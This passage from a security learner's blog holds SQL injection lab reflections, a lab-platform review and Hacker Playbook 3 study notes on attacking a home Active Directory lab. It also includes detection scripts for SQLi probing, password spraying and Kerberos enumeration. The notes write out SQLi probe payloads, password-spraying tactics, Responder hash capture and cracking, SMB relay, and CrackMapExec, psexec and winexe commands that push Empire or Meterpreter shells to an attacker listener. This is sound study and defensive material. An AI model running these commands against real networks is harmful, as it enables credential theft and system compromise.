Posted in Blog, PortSwigger

PortSwigger Web Academy – What have I gotten myself into? (SQLi)

So I’ve started working on the PortSwigger Web Academy because why not? Well, maybe because I’m (still) working on the IHRP stuff from eLearnSecurity and have started the THP course to help prep for that. Why do web app pentesting stuff? The short answer is because I think it nicely complements what I’m doing. Maybe I’m trying to justify my habit of chasing squirrels, but I’m seeing direct application already of what I’ve learned doing the SQLi section and what I need to do day-to-day. I am focused on the incident response/threat hunting/threat intel side of things, but I believe the info in the Web Academy supports those. It’s giving me ideas for things to look at and valuable hands-on keyboard stuff to go with the more theoretical stuff I’m doing to prep for IHRP.

I hope to script out the labs to get more practice with Python (one of the things I’m working on – those will end up on my GitHub), and I’m planning to make some short notes on here to kind of summarize what I’ve learned and how I’m applying it. The labs are excellent and build well (as in from one lab to the next) for the most part. There are some jumps, but solutions have been provided for every lab I’ve looked at so far. The community solutions are solid too. The community solutions aren’t available on all labs yet, but it looks like Rana Khalil and Michael Sommer are both working on getting labs done. They have different styles, but both are helpful.

Need To Know

The content helps with the labs, but there are sometimes jumps or connections that aren’t presented. Since the solutions are provided, it’s not bad. If you have the Web Application Hacker’s Handbook, it’s good to have on hand. You will also need Burp Pro to do some of the labs. It’s not cheap, but it’s not terrible. You can do a lot with the free Community version, but there are some things you just can’t do with it. It’s also rate limited, so some things will be painfully slow. Scripting can help, but not completely. Scripting something out can mean it takes minutes instead of hours (and hours) in the Community version though. I’d recommend picking up the Pro version if possible.

Either way, take some time learning about how to use Burp Suite. Definitely tweak the options to set up the fonts and theme to your liking. I find the default fonts a little hard to read. And if you are a keyboard shortcut addict (like me), use the keyboard shortcuts and add your own. My little cheat sheet for keyboard shortcuts is here and includes the ones I’ve added to make my life easier (Burp is toward the bottom – I put everything here because it works for me).

I think someone with little to no technology background could do these, but it would be very frustrating. With the solutions, getting through the labs without knowing what you are doing is possible, but I don’t think that would help with either passing the certification or developing a solid skillset. If someone were to use the content in the Learning Path as a guide, I think you could go from limited skills to a decent set of web app pen testing skills (to use for bug bounties for example). I think supplementation would be necessary.

My General Approach

I try to at least get started on my own, but I go to the solutions after a bit. That’s just the reality of my limited time. I’ll do what I can without looking, but I’m not willing to spend hours tracking stuff down. Initially at least. The good thing about the PortSwigger provided solutions is they are broken into steps so you can unhide to get an idea of where to go next and hide again to see how far you can get with that breadcrumb. The solutions also don’t give exactly what to do (because of variability in the labs), so you can’t just point and click your way through. I used them to work through the first section (SQLi), and then I went back through using the Khalil videos on a couple to improve my understanding. After a few of those, I decided scripting the exploits would force me to understand the process more deeply, so I went that route. Plus Python practice. I do recommend going through the content before the associated lab – that will help quite a bit. If you are experienced pentesting web apps, it might not be worth the time.

My goal is to get the information in an efficient manner, and this approach works well for me. I repeated the labs until I could solve them quickly and consistently to ensure I had the concept down. If I didn’t understand something, I went searching so I understood what was going on. I feel a little bleh about going to the solutions, but I have to prioritize where my time goes. Yes, I’m rationalizing. No, I don’t care. At least not enough to not do it.

SQLi Takeaways

The biggest takeaway is to have a framework/methodology. The labs hint at this by their order and scaffolding. I think the biggest disconnect between the labs and real-life pentesting is that the labs tell you where to look. Burp Scanner is incredibly helpful, but if you don’t understand how the exploits work, having the payload provided may not be enough. A big bonus of working through this section was getting really familiar with Burp Suite. I’m still not great, but I’m much more comfortable with it than I was. I think that will help make future labs a little bit easier since I’m better with the toolset.

My general framework for checking for SQLi manually:

  1. Poke around and see possible injection points – use Burp Proxy, Inspector, etc. to see where I can mess with things.
  2. Try things that will work for each of the popular database types (Oracle, MySQL, MS SQL, etc.).
  3. Try messing via basic injections like a single quote ('), a comment (--), or ' OR 1=1-- to see if anything breaks.
  4. Depending on what happens in earlier steps, determine whether a UNION-based approach might work; if so, try it.
    1. Try to determine the number of columns using ORDER BY.
    2. See if any columns take text using the UNION SELECT null,'a' approach.
  5. If nothing is obvious, try basic blind SQLi attacks.
  6. If still nothing, give the DNS lookup (out-of-band) option a shot.
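Since my day job is on the IR/threat hunting side, here is what that framework looks like from the other direction. This is an added example (mine, not from the PortSwigger content or the labs): it runs over a few constructed Apache-style access log lines, URL-decodes each request, tags the probe classes from steps 3 through 6, and only raises a source that walks through more than one class, because a lone apostrophe (O’Reilly) is normal traffic. The probe patterns and the sample endpoint are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Probe classes mapped to the steps of the manual framework above. The regexes
# are assumptions about typical probe syntax, not an exhaustive signature set.
PROBES = {
    "quote":     (re.compile(r"'"), "step 3"),
    "comment":   (re.compile(r"--|/\*"), "step 3"),
    "tautology": (re.compile(r"\bOR\s+\S+\s*=\s*\S+", re.I), "step 3"),
    "order_by":  (re.compile(r"\bORDER\s+BY\s+\d+", re.I), "step 4.1"),
    "union":     (re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I), "step 4.2"),
    "blind":     (re.compile(r"\bSLEEP\s*\(|\bWAITFOR\s+DELAY\b|\bpg_sleep\s*\(", re.I), "step 5"),
    "oob":       (re.compile(r"\bxp_dirtree\b|\bUTL_INADDR\b|\bUTL_HTTP\b|\bLOAD_FILE\s*\(", re.I), "step 6"),
}

# Apache combined log format; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample traffic (not real logs): one source walking steps 3 and 4
# of the framework against a lab-style /filter endpoint, plus benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2020:10:01:02 +0000] "GET /filter?category=Gifts HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2020:10:01:09 +0000] "GET /filter?category=Gifts%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2020:10:01:15 +0000] "GET /filter?category=Gifts%27+OR+1%3D1-- HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2020:10:02:01 +0000] "GET /filter?category=Gifts%27+ORDER+BY+3-- HTTP/1.1" 500 312 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2020:10:02:20 +0000] "GET /filter?category=Gifts%27+UNION+SELECT+NULL,%27a%27-- HTTP/1.1" 200 6100 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2020:10:03:00 +0000] "GET /filter?category=Toys+%26+Games HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2020:10:04:00 +0000] "GET /search?q=O%27Reilly HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
"""


def decode_target(target, max_rounds=3):
    """URL-decode until the string stops changing; returns (decoded, rounds).
    More than one round means the payload was double-encoded, a common
    filter-evasion trick that is worth a tag of its own."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target, rounds = decoded, rounds + 1
    return target, rounds


def analyze_line(line):
    """Parse one log line; returns None for non-matching lines, otherwise a
    record with the decoded request target and the probe classes it hit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded, rounds = decode_target(m["target"])
    tags = {name for name, (rx, _) in PROBES.items() if rx.search(decoded)}
    if rounds > 1 and tags:
        tags.add("double_encoded")
    return {"src": m["src"], "status": int(m["status"]), "target": decoded, "tags": tags}


def analyze_log(text):
    """Records for every line that matched at least one probe class."""
    return [r for r in (analyze_line(l) for l in text.splitlines()) if r and r["tags"]]


def framework_steps(text):
    """Map each source to the framework steps its probes correspond to."""
    steps = defaultdict(set)
    for r in analyze_log(text):
        for tag in r["tags"]:
            if tag in PROBES:
                steps[r["src"]].add(PROBES[tag][1])
    return {src: sorted(s) for src, s in steps.items()}


def suspicious_sources(text, min_classes=2):
    """Sources that hit at least min_classes distinct probe classes. A single
    quote or a stray -- shows up in real traffic; a source that methodically
    moves through several classes is someone running the framework above."""
    seen = defaultdict(set)
    for r in analyze_log(text):
        seen[r["src"]] |= r["tags"]
    return sorted(src for src, tags in seen.items() if len(tags) >= min_classes)


if __name__ == "__main__":
    print(framework_steps(SAMPLE_LOG))
    print("suspicious:", suspicious_sources(SAMPLE_LOG))
```

Widen PROBES to the database-specific syntax you actually care about (step 2) before trusting it on production logs; the point is the per-source progression, not any one regex.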

Depending on what you are doing, using a scanner might save you valuable time. But scanners can sometimes be problematic (or too noisy when pen testing). If you use Burp Scanner, make sure you look through the options. The default scan doesn’t take the everything-but-the-kitchen-sink approach, so if you have an idea of what to look for, you may want to customize the scan.

I probably won’t be doing a lot of lab explanations/walkthroughs. I think looking at how people approach the problem is helpful, so I might jot down a few notes if I have time, but more than likely, I’ll throw scripts on GitHub (probably with more documentation than is Pythonic) and section reflections here.

Going Forward

How long will it take to finish all the sections? Kind of feel like forever given it’s not my primary focus. But it’s fun and a nice way to shift my focus and wake my brain up a bit. The scripting practice is really good for me.

I would definitely recommend this if you want to get into web-app pentesting. It’s a good way to get practice even if you stick with just the Community version. If you are a staunch blue teamer, it might not be the best use of your time, but I think it’s helpful to switch things up occasionally.

Posted in Review

LOD – Learn on Demand Systems Review

I do a LOT of labs. I think labs are critical for developing skills and help you learn ways to effectively execute proof of concept trials. Plus it’s the only way you can work on a lot of things without risking messing up something in production. I’m a big fan of building out home labs using virtual machines and cloud hosting, but sometimes pre-built labs are a better choice because of time or skill constraints to set everything up. I’ve been doing a bunch lately from Learn on Demand. So I wanted to share a few thoughts on the platform for those looking to develop training that will use labs. The info is good for students too, but the platform is really more for those developing training.

Sidenote: I’ve been doing these through Cybrary (where I’m a TA), so they haven’t been purchased through a class or other training.

The Good

I’ve found these labs to be well done with stable environments. I’ve had a few with issues, but for the most part the labs run smoothly. There are a lot of pre-built labs covering a lot of platforms. There are typical labs where you work through the tasks with instructions. There are also “IT Pro Challenges” where you get directions about what to accomplish without the step-by-step instructions. The different levels of these vary in how much help you have available and seem appropriately challenging.

They also make a decent number of labs available to try for free. You have to enter contact info to get a link, which I’m not thrilled about, but I understand. The free labs include options for AWS, Azure, and Linux. So you can get a really good idea of what the labs look like. From a student’s perspective, it gives you a chance to pick up some new skills for minimal/no cost.

There are lab offerings for several specific training courses, including Microsoft…but they aren’t really available for purchase as an individual.

The Bad

Finding cost info for these labs is very difficult. I’ve yet to find a way without having to submit info. I don’t like that approach, but given the platform is more for instructors to offer labs to classes they are teaching than for students to purchase labs, I do understand it. Just not really a platform for students to pick up labs.

Occasionally I’ll run into issues with virtual environments taking a long time to load or not functioning properly. I’ve found the issues to be less common on this platform than others I’ve used. And I’ve found support to be very responsive when contacted. Even when things are a bit slow to load, the time allotted is usually more than enough. There is only 1 lab I can think of where I ran out of time because the lab architecture was being crabby.

Just like any lab with virtual machines, using keyboard commands can get interesting. Figuring out which CTRL key stays with the VM can make the labs an adventure, but I don’t often find this to be an issue. There have been a few times when entering a CTRL command resulted in my browser window closing. A little annoying, but I was able to relaunch and pick up where I left off.

The Verdict

Bottom line, I like when I am taking a training that uses Learn on Demand labs. I know the labs will be stable and well done. I would like for the platform to offer a way for students to easily access the labs without going through training, but I understand this isn’t the focus. There may be more options available if you go through contacting the sales, but I haven’t tried that since I have access through other means. I can see using the labs to verify skills when interviewing for positions or to assess where a new employee needs training. I really like the challenge approach to the labs. The different levels (Getting Started, Guided, Advanced, and Expert) build well and offer some clear learning pathways. I’ve found that by working through the Getting Started and Guided challenges on a topic I’m usually in really good shape for the Advanced and Expert labs.

Probably the best thing I can say about Learn on Demand is that I would consider their labs if I were developing training. Having taught online for a good while, I’m quite picky about the resources I use. I would have no problem using LOD as the platform for my labs, and the availability of pre-built labs makes it a great way to save a bit of time on class prep.

Posted in Blog, Resources, THP3

THP3 Ch 4 Review

Disclaimer: Educational purposes, personal reference, don’t do illegal hacking, IANAL, etc.

Note: THP3 is my primary source for this. I’m putting my thoughts and notes to help me remember the info while avoiding putting too much info from the book here. If you are considering buying the book, I highly recommend it. 

THP3 04 – The Drive – Compromising The Network

The focus of this chapter will be corporate environments and living off the land. A definite red team focus. I’m looking forward to working through THP2 once I’m done with this to fill in some blanks. There won’t even be a vuln scan run in this chapter, which is great because it helps avoid detection.

I’ll say upfront that this was a very frustrating chapter. Not because of what Kim covered, but because of the nature of setting up a more complicated virtual environment. Setting up the network was doable, but doing a mini-setup means there’s not a lot going on in the network. So a lot of the tools will likely work better in an actual environment than in the lab. Since I was also working with the current versions of the various Windows systems, there were likely some exploits that have been dealt with. I’ve spent a lot of time working through the tools and have them “working”, but not necessarily getting what they should on the network. Luckily I’ve got some labs available in a certification that I’m working on that I’ll be able to do some additional practice on. The experience with the tools and troubleshooting is invaluable, but it is frustrating when things don’t work like they should. It did lead me to chasing some alternatives and learning a ton. So in the end, it’s all good. I’m okay continuing to bang away at this while continuing in the book. I’ll take notes, keep track of tools, and apply the info as I’m working on other labs.

Finding creds outside the network

First up is getting an initial entry point. It can be complicated and resource-intensive. Kim recommends KISS, and goes straight to password bruteforcing. This makes sense given all of the authentication required with various enterprise services. And finding things that are authenticated using the victim’s sign-on info can provide a foothold. This will involve password spraying. Going after external sources is helpful because the log-in attempts might not be logged, stuff on the perimeter might not require multi-factor authentication, people reuse passwords, and account lockout might not be enabled. In short, external sources often have a lower security level.

Kim notes that the fake mail server doesn’t exist anymore, so I feel like testing options are limited here. I’ll go back and research options for testing mail servers later.

Spray from SpiderLabs is a password spraying tool that supports multiple enterprise services (OWA, Lync, Cisco Web VPN, etc.). Passwords to use should be chosen based on the company. Kim reports commonly successful passwords as those including season and year, local sports team and digits, looking at older breaches and using similar passwords, and company name plus year, numbers, and/or special characters. It’s a good idea to run these scans slowly to avoid lockout. Seems like a good use of a server. Spray includes user and password files in several languages. Make sure to take a look at the password files and update as appropriate with the current year and potentially sports teams as mentioned above.

To configure Spray, you’ll need to capture a POST request for a password attempt (use Burp or ZAP) and save the data to a file. Check out the README for Spray to get the details of how each spray option would need to be configured. I went through targeting the practice website. Script worked fine – just slow going.

Ruler by Sensepost can also do bruteforcing and can do some persistence exploitation as well. It does some autodiscovery of Exchange configuration and looks for creds. It’s a pretty cool tool. I’m going to have to find a way to do some work with both of these on test environments.

Moving through the network

This will be exploitation that occurs after gaining access to the network. It’s time to do some network setup. Microsoft licensing means it’s hard to find Windows VMs, and you have to build the network yourself. This has been on my to-do list, so it’s nice to have to do it for book club. I suspect I’ll need to pull in some additional resources. All of the Windows options expire after a set time.

First up, the server. Kim addresses Windows Server 2016 in THP3 and Windows Server 2012 in THP2. Microsoft provides VMs to test Edge and IE. They expire after 90 days, but Microsoft recommends creating a snapshot when first installing the VM to roll back to. That’s what I’ve done previously. You can get demo ISOs for the servers from Microsoft. I recommend taking snapshots frequently as you go. While walking through the entire setup process when you’ve forked something is educational, it can get old. Also check the time settings on your VMs to avoid time sync issues.

A few helpful walkthroughs dealing with VM setup and Windows Server 2016 from Couchbase and a Microsoft TechNet Wiki that includes complete lab setup info. Once you’ve got the VM loaded, time to set up Active Directory. Then add users using Active Directory Administrative Center or PowerShell. I found the PowerShell option quicker – just note the changes won’t show up until you refresh the management center.

 # Create a user; Read-Host prompts for the password so it never sits in the shell history
 New-ADUser -Name "<name>" -SamAccountName "<name>" -AccountPassword (Read-Host -AsSecureString "Input Password:") -Enabled $true
 # Create a group; <scope> is DomainLocal, Global, or Universal
 New-ADGroup -Name "<groupname>" -SamAccountName "<groupname>" -GroupScope "<scope>"
 # Add one or more members to the group
 Add-ADGroupMember -Identity <groupname> -Members <member1>,<member2>,<member3>

AD setup was surprisingly straightforward and intuitive (I’m sure I’ll regret saying that as I do more network setup), so on to setting up the client machines. This was a bit more finicky – make sure you’ve got everything on the same network and the network is set to private – which is annoyingly obscure on Win8.1. You’ll need to set your boxes to use the server as the DNS. Or at least that’s what I had to do because just adding it to the hosts file didn’t cut it. Luckily I’ve got a few more VMs to set up, so I’ll keep working out the correct sequence. Sidenote – I’m also remembering just how much I disliked Windows 7 and 8.1.

Joining the domain once you’ve got the network lined up is pretty easy – Control Panel > System and Security > System > Advanced System Settings > Computer Name. Then click “Change” and select the Domain option. You can put in either the FQDN or the NetBIOS name. If you are having trouble using the NetBIOS option, try the FQDN.

Dealing with GPO…open up Group Policy Management on the server. Kim has the GPO set to disable firewall, disable AV, disable updates, add the Helpdesk group to the local admins group, and link the GPO to the root domain. Going forward, I’ll set up the GPO before adding other boxes to the network.

Important Steps for Setup

  • Download your VM builds (clients) and an ISO for the server from Microsoft

  • Load VMs – take snapshots before starting for the first time

  • Setup domain controller on server – set up static IP for server and set it to be the DNS server

  • Setup active directory on server

    • It would be a good idea to give the server a name that’s easy to remember, just makes life easier.

  • Create users and groups

  • Setup group policy (see below for details)

  • Set up clients to join the domain

    • Put all on Host-Only network (Not required, but is my preferred option; could also do a NAT network)

    • Set up server to be DNS server (Network Connections – Change settings of this connection – Adjust IPv4 settings)

    • Make sure the network is set to private (start setting up sharing and it should ask if you want to make it private – Network status – View Network computers and devices). It’s not as straightforward as it is for WiFi, so you may have to dig around a bit.

    • Control Panel – System and Security – System – Advanced System Settings

      • Change name to something specific

      • Click on Domain radio button and put in domain name

  • Clone client machines as desired

Set up group policy on server

  • Open up Group Policy Management

  • Edit an existing GPO or create a new one

  • Disable AV – Computer configuration > Policies > Administrative Templates > Windows Components > Windows Defender > Real-time Protection

  • Disable Firewall

    • Computer configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall

    • Computer configuration > Policies > Windows Settings > Security Settings > Windows Firewall > Protect all network connections > Disabled (set for Domain Profile and Standard Profile)

  • Disable updates – Computer configuration > Policies > Administrative Templates > Windows Components > Windows Update

  • Add Helpdesk to local admin group: Computer configuration > Preferences > Control Panel Settings > Local Users and Groups

    • New > Local Group > Administrators (Built-in)

    • Make sure action is Update

    • Add desired group

  • Only allow local login for Domain Admins, Local Administrators, and Helpdesk: Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Allow Logon Locally

  • Enable file and print sharing: Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Allow inbound file and printer sharing

  • Disable SMB signing

    • SMB v1 disabled through a registry item in the GPO

    • SMB2 seems to need to be modified in the GPO to avoid breaking the policy

      • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options

  • Make sure the GPO is linked to the domain

Overall, not too bad for the first time through. I got some errors about automatic logon, but I’m okay leaving that off since it wouldn’t likely be on in an enterprise environment.

On to installation of Internet Information Services (IIS)…Kim provides a link to a walkthrough. Run this command on your server, then make sure it worked by going to the IP in a browser.

 Install-WindowsFeature -name Web-Server -IncludeManagementTools

It also says to configure SPNs (Service Principal Names). I connected the IIS server to a host header.

 Setspn -A HTTP/<hostname> <iisServerName>
 Setspn -A HTTP/ csklabserver

I also set up a file share just to do it. I may go back and add a few things to the network, but this was a good start. Getting the GPO setup was the most fiddly part. I ran into some issues where my server decided to go on a field trip and I had to fix the time settings, but otherwise it went smoothly.

On The Network With No Creds

First up is doing some digging around the network without creds. This is working from getting on the network in whatever way and digging around. This could be from physically infiltrating the site or other methods.

Responder was the first tool. It worked well. Just a matter of waiting for something usable. You can either catch hashes and crack them or set up a popup to ask for creds. Not stealthy, but would get the job done. Once you play with this a little, it’s fairly easy to use. I did have to install some tools to get Responder running without complaint – hcxtools and hcxdumptool. That was on my 64-bit Kali VM and I couldn’t recreate the issue on the 32 bit. A little odd, but reinforces the importance of testing your tools and knowing your setup.

Get to the Responder directory (/usr/share/responder in regular Kali build), start Responder, get the info, then use Hashcat or similar to crack the NTLMv2 hashes. Hashcat has a ton of options, so take a look at the details. (Side note – you might also want to check out Crunch to generate custom wordlists if you can find out about the password policies in place or OSINT info on the accounts you capture hashes for.)

 # Start Responder on the chosen interface (./Responder.py -h lists the options)
 ./Responder.py -I <interface> [options]
 # Crack the captured hashes; -m 5600 is hashcat's NetNTLMv2 mode
 hashcat -a <attackmode> -m <hashtype> <filetocrack> <wordlistfile> -r <rulefiles>

The MultiRelay option was much more of a pain to get working. I played with this quite a bit before a friend said he thought it only worked on Windows 2012 and earlier servers. This made sense to me because when I ran RunFinger to check the network, the only target identified was my Win7 box. So I had to download the ISO for 2012 and spin up a new VM for it. And add it as an additional domain controller. Good networking practice at least. Things got a little wonky, so I decided to start again using my Win2012 server as the initial DC. Got that set up as above, got the VMs back on the domain, and I was able to get MultiRelay working. Major lesson learned – know what all SMB is doing on your network before messing with it. There are quite a few things with SMB1 dependencies, so even though it’s recommended to disable it, that can cause major issues. But the issue for MultiRelay is SMB signing, so that is what needs to be disabled in the GPO. I spent way more time messing with this than I should have, but I wanted to understand what was going on and what made the network vulnerable. I was able to get a Win2016 DC added to my 2012 network and use MultiRelay to get a shell on there. When you start with newer versions of Windows, the things that let MultiRelay work aren’t there anymore. Trying to access my share with Windows 10, I basically got a security warning that said “nope”.

MultiRelay related commands:

 # Start Responder in another terminal from the responder folder
 ./Responder.py -I eth0 -rv
 # Use RunFinger if desired to identify targets (it reports whether SMB signing is required); run from responder/tools folder
 ./RunFinger.py -i <IPrange>
 # Run MultiRelay from responder/tools folder
 ./MultiRelay.py -t <targetIP> -u ALL [-c <commands or payload>]

A few more references…

User Enumeration Without Creds

Nmap has a script to enumerate users. Once I got the syntax, this worked well. The main limitation is having a viable userlist. The default list pulled the administrator account. Combine this with some OSINT, and you should be able to enumerate the users. Only issue is watch the syntax.

 nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='realmname' <DomainControllerIP>

If you have a wordlist (like the Metasploit namelist provided on Kali), you add ,userdb=<filename>.

 nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='thp3lab',userdb=/usr/share/wordlists/metasploit/namelist.txt
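From the detection side, the password spraying in the “Finding creds outside the network” section and the krb5-enum-users scan above leave the same shape in the logs: one source touching many distinct accounts in a short span. This added example (mine, not from THP3 or either tool) runs one sliding-window check over constructed Windows security events, once for 4625 logon failures (sub-status 0xC000006A bad password, 0xC0000064 unknown account) and once for 4768 TGT requests with result 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), which is what every nonexistent name in the wordlist produces. The event records and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def _ev(ts, eid, src, user, code):
    """Minimal constructed security event: timestamp, event id, client IP,
    target account, and the status / result code from the event."""
    return {"ts": datetime.fromisoformat(ts), "id": eid, "src": src, "user": user, "code": code}


# Constructed sample events (not from a real DC).
EVENTS = [
    # One user mistyping a password three times: noisy, but one account only
    _ev("2020-03-12T10:00:01", 4625, "10.0.0.7", "alice", "0xC000006A"),
    _ev("2020-03-12T10:00:20", 4625, "10.0.0.7", "alice", "0xC000006A"),
    _ev("2020-03-12T10:00:41", 4625, "10.0.0.7", "alice", "0xC000006A"),
    _ev("2020-03-12T10:05:00", 4768, "10.0.0.7", "bob", "0x0"),   # normal TGT request
]
# One password tried against eight accounts, seconds apart: the spraying shape
EVENTS += [_ev(f"2020-03-12T11:00:{i * 7:02d}", 4625, "10.0.0.50", f"user{i:02d}", "0xC000006A")
           for i in range(8)]
# AS-REQs for names that do not exist (result 0x6): the krb5-enum-users shape
EVENTS += [_ev(f"2020-03-12T12:00:{i * 2:02d}", 4768, "10.0.0.60", name, "0x6")
           for i, name in enumerate(["aaron", "abby", "adam", "admin", "alan", "alex"])]


def burst_sources(events, event_id, codes, window=timedelta(minutes=10), min_users=5):
    """Return {src: distinct_accounts} for every source that hits at least
    min_users distinct accounts with the given event id and codes inside any
    window-sized span. Counting distinct accounts rather than raw failures is
    what separates a spray from a single-account brute force or a typo."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["id"] == event_id and e["code"] in codes:
            by_src[e["src"]].append(e)
    hits = {}
    for src, evs in by_src.items():
        for i, start in enumerate(evs):
            users = {e["user"] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            if len(users) >= min_users:
                hits[src] = max(hits.get(src, 0), len(users))
    return hits


def detect_password_spray(events, window=timedelta(minutes=10), min_users=5):
    """4625 with a bad password or unknown account across many accounts.
    Spray runs are deliberately slow to dodge lockout (see the Spray notes),
    so widen the window, e.g. hours, to catch low-and-slow attempts."""
    return burst_sources(events, 4625, {"0xC000006A", "0xC0000064"}, window, min_users)


def detect_kerberos_enum(events, window=timedelta(minutes=1), min_users=5):
    """4768 with result 0x6 across many names from one client: a wordlist
    being fed to the KDC, which is exactly what krb5-enum-users does."""
    return burst_sources(events, 4768, {"0x6"}, window, min_users)


if __name__ == "__main__":
    print("spray:", detect_password_spray(EVENTS))
    print("kerberos enum:", detect_kerberos_enum(EVENTS))
```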

Scanning the Network with CrackMapExec (CME)

This focused on using Empire’s REST feature, so I’ll be going back to play more with CME because there are a lot of options. I’m using my Kali VM since I’m using VirtualBox. There’s a nice writeup here on the basics. Note – I had to use crackmapexec to call the program rather than cme as in the book; it depends on how you install it. I got a KeyError: 'launcher' error. Did some digging and found a fix. Looking at the comments, it seems Empire changes regularly, so any tools used with it should be checked before they are needed. The fix did work – you have to make a couple of edits to the /usr/lib/python2.7/dist-packages/cme/modules/ file (see the link for details). I got it to run with Empire, but it didn’t seem to connect. I think I may need to spend a week just messing around with Empire – it seems to be rather finicky.

Setting up the listener in Empire was a little fussy. Between the book, the Getting Shells 101 CME documentation, and general troubleshooting, I got my listener going. Make sure you’ve setup the cert in Empire. I ended up resetting Empire and generating a new cert.

 cd /opt/Empire

Then start Empire and setup the listener. Make the password whatever is in your config file for CME.

 ./empire --rest --password 'password'
 (Empire) > listeners
 (Empire: listeners) > uselistener http
 (Empire: listeners/http) > set Name cmeTest
 (Empire: listeners/http) > set Host <YourIP>:<Port>
 (Empire: listeners/http) > set Port <Port>
 (Empire: listeners/http) > set CertPath <CertPath> # default is data
 (Empire: listeners/http) > execute

CME also has a Meterpreter module. I gave that a shot since I’m pretty comfortable with Metasploit. Basically set up a handler, then run the CME using the metinject module. I wasn’t able to get a shell with this either, so I’m going to have to play with this some more. Both say the payloads have been executed, but no connection is made in either.

 # General form: target range, creds, module, and module options
 crackmapexec <IPrange> -u <username> -p <password> -M <module> -o <options>
 # Empire stager via the REST API; LISTENER is the listener name set up above
 crackmapexec <IPrange> -u user1 -p password -M empire_exec -o LISTENER=test
 # Meterpreter injection; LHOST/LPORT must match the Metasploit handler
 crackmapexec <IPrange> -u user1 -p password -M metinject -o LHOST=<YourIP> LPORT=8443

You can also use Metasploit to see where the creds are valid using the smb_login module. CME is much faster though.

 msf > use auxiliary/scanner/smb/smb_login
 msf auxiliary(smb_login) > set RHOSTS <IP range>
 msf auxiliary(smb_login) > set SMBDomain <domain>
 msf auxiliary(smb_login) > set SMBUser <user>
 msf auxiliary(smb_login) > set SMBPass <password>
 msf auxiliary(smb_login) > services -p 445 -R
 msf auxiliary(smb_login) > run


I went chasing squirrels to better compromise the network. I didn’t get the foothold I wanted with the book’s tools, so I went looking for options. A friend had mentioned Impacket as an alternative to MultiRelay. Raj Chandel has a nice beginner’s guide, but like many of the guides the focus is listing what the tool does rather than putting it into practice. Metasploit Minute has a YouTube video that walks through some of the examples. I’ll keep working with this and the other network attacks. I like Impacket a lot and will keep exploring its capabilities. Once you get the hang of the syntax, it’s really easy to work with.

Found this nice write-up on using creds to own Windows boxes. I used the winexe option to get a shell and then used Empire to generate a one liner. I was able to get an agent established and send commands using modules on my Win7 box. I didn’t get the expected results though. Another step in the right direction at least. I suspect that the way I have my network setup doesn’t have the necessary SMB vulns to make this work.

 winexe -U domain/user%password //IP cmd.exe
 # In Empire
 usestager multi/launcher
 set Listener http

I suspect a lot of the issues I’m running into have to do with working with a small network with limited modification. It also seems like with SMBv3.0, things get a lot less effective. I got multiple errors putting the launcher code into the systems I had shell on.

Since I did have creds, using the psexec module in Metasploit worked well. I did have to specify the domain though.

 msf > use exploit/windows/smb/psexec
 msf exploit(windows/smb/psexec) > set RHOST <targetIP>
 msf exploit(windows/smb/psexec) > set SMBPass <password>
 msf exploit(windows/smb/psexec) > set SMBUser <username>
 msf exploit(windows/smb/psexec) > set SMBDomain <domain>
 msf exploit(windows/smb/psexec) > run

This let me easily upload the Empire payloads, but I got errors with several of the options.

A list of related references in no particular order for future reference…

After Compromising Your Initial Host

Lots of info here about what to do once you have a shell. There’s also info about a Github repo script with a lot of the commands from The Red Team Field Manual that can be used to search for commands from the book. I also found another Github with RTFM inspired cheat sheets. I just got copies of this and The Blue Team Field Manual, and it’s nice to have an idea of how to make the material more portable and easier to search. Pretty cool.

Privilege Escalation

Getting from a regular user to a privileged user is always a goal.

Methods Kim listed

  • Unquoted service paths

  • Finding insecure registry permissions for services

  • Check if the AlwaysInstallElevated registry key is enabled

I didn’t go digging too much with these on my network because there was a Privilege Escalation lab using Metasploitable3. So onto that…

Privilege Escalation Lab

Getting Metasploitable3 up and running can be a little more finicky than other VMs. It’s not difficult, just a little different. I think the intro blog from Rapid7 has the simplest install instructions. I did have to adjust the network adapter used, but nothing significant. There are a lot of options in Metasploitable3 and lots of resources online to go through.

Running an nmap scan showed lots of open ports. Kim chooses to target ManageEngine. Searching ManageEngine in Metasploit shows several potential exploits to use. Kim chooses the connection_id option to explore. This works, but isn’t privileged, so onto checking out processes with ps. Kim points out Tomcat and that you can google to find where user info is stored. Then using dir to search for the file and type (basically the Windows equivalent to cat) to display it. Use the creds found to log in to the Tomcat management console to make sure they work…ok, how to do that? The easiest option is going to a browser. There are CLI options, but it didn’t seem to be set up on the box. The browser was easier. Creds worked, so back to Metasploit to repeat the process with Tomcat. And get a connection error because Metasploitable3 decided to take a break. Get it back up and running, and the exploit worked as expected.

It was great to work with Metasploitable3 a bit. There’s definitely a lot to work with, so it stays on the list of things to work on. This chapter has been great to get a more extensive home lab built up. Having that experience will help me build a solid testing network on an old server I have.

Pulling Clear Text Credentials from Memory

